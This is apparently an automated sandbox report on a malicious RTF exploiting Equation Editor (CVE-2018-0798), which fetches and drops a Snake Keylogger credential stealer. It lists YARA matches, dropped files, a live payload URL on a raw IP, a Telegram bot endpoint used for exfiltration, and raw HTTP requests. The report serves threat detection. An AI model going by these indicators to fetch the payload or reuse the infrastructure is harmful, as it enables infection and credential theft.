Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179

Source: EQNEDT32.EXE, 00000002.00000003.908007416.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.908630489.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com} equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000003.908007416.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.908630489.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.907989130.0000000000602000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.908270484.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.67.105.179/arinzezx.exe
Source: EQNEDT32.EXE, 00000002.00000003.907989130.0000000000602000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.67.105.179/arinzezx.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.908270484.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.67.105.179/arinzezx.exej
Source: EQNEDT32.EXE, 00000002.00000002.908270484.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.67.105.179/arinzezx.exemmC:
Source: rinzearec84736.exe, 00000006.00000002.1173839391.00000000023B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: rinzearec84736.exe, 00000006.00000002.1173839391.00000000023B9000.00000004.00000800.00020000.00000000.sdmp, rinzearec84736.exe, 00000006.00000002.1173667930.0000000002361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: rinzearec84736.exe, 00000006.00000002.1173338666.000000000079B000.00000004.00000020.00020000.00000000.sdmp, rinzearec84736.exe, 00000006.00000002.1173667930.0000000002361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: rinzearec84736.exe, 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, rinzearec84736.exe, 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: rinzearec84736.exe, 00000006.00000002.1173667930.0000000002361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgP
Source: rinzearec84736.exe, 00000006.00000002.1173667930.0000000002361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rinzearec84736.exe, 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, rinzearec84736.exe, 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5F045E8A-1FBB-4CF2-90BD-E34311AE33F9}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET /arinzezx.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 208.67.105.179Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

System Summary

Malicious sample detected (through community Yara rule)

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.rinzearec84736.exe.226663c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 5.2.rinzearec84736.exe.2249628.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rinzearec84736.exe PID: 648, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: rinzearec84736.exe PID: 648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\arinzezx[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\rinzearec84736.exe			Jump to dropped file

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf, type: SAMPLE	Matched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 2.3.EQNEDT32.EXE.5c2588.0.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.5c2588.0.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.2.EQNEDT32.EXE.5c2588.0.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.2.EQNEDT32.EXE.5c2588.0.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.rinzearec84736.exe.226663c.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 5.2.rinzearec84736.exe.2249628.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rinzearec84736.exe PID: 648, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: rinzearec84736.exe PID: 648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_001D1040	5_2_001D1040
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_001D008C	5_2_001D008C
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_001D1BE8	5_2_001D1BE8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_001D1D96	5_2_001D1D96
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_001D0519	5_2_001D0519
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_001D55B0	5_2_001D55B0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_001D5850	5_2_001D5850
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_001D5841	5_2_001D5841
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_04920006	5_2_04920006
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_04920048	5_2_04920048
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C4CA8	6_2_001C4CA8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CDCDC	6_2_001CDCDC
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CE129	6_2_001CE129
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C3D69	6_2_001C3D69
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CE580	6_2_001CE580
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C5181	6_2_001C5181
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C65A1	6_2_001C65A1
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CE9D9	6_2_001CE9D9
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C31C1	6_2_001C31C1
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CA9F0	6_2_001CA9F0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C55E1	6_2_001C55E1
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CEE30	6_2_001CEE30
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C5A40	6_2_001C5A40
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C4660	6_2_001C4660
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CF288	6_2_001CF288
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C5EA0	6_2_001C5EA0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CF6E0	6_2_001CF6E0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CFB38	6_2_001CFB38
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001CA120	6_2_001CA120
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_001C26E8	6_2_001C26E8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00265220	6_2_00265220
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00269828	6_2_00269828
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026C030	6_2_0026C030
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00261600	6_2_00261600
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026E600	6_2_0026E600
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00263010	6_2_00263010
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00263468	6_2_00263468
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00266C68	6_2_00266C68
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026C678	6_2_0026C678
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00260048	6_2_00260048
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00268248	6_2_00268248
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026EC48	6_2_0026EC48
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00261A58	6_2_00261A58
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002604A0	6_2_002604A0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002686A0	6_2_002686A0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00261EB0	6_2_00261EB0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00269C80	6_2_00269C80
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002670E8	6_2_002670E8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002608F8	6_2_002608F8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002638C0	6_2_002638C0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026CCC0	6_2_0026CCC0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026A0D8	6_2_0026A0D8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00268B20	6_2_00268B20
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00264730	6_2_00264730
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026A530	6_2_0026A530
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00262308	6_2_00262308
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00265F10	6_2_00265F10
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026D310	6_2_0026D310
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00262760	6_2_00262760
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026D960	6_2_0026D960
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00268F78	6_2_00268F78
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00267540	6_2_00267540
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00260D50	6_2_00260D50
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002611A8	6_2_002611A8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026DFB0	6_2_0026DFB0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00262BB8	6_2_00262BB8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026A988	6_2_0026A988
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026B390	6_2_0026B390
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00267998	6_2_00267998
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026B9E0	6_2_0026B9E0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00267DF0	6_2_00267DF0
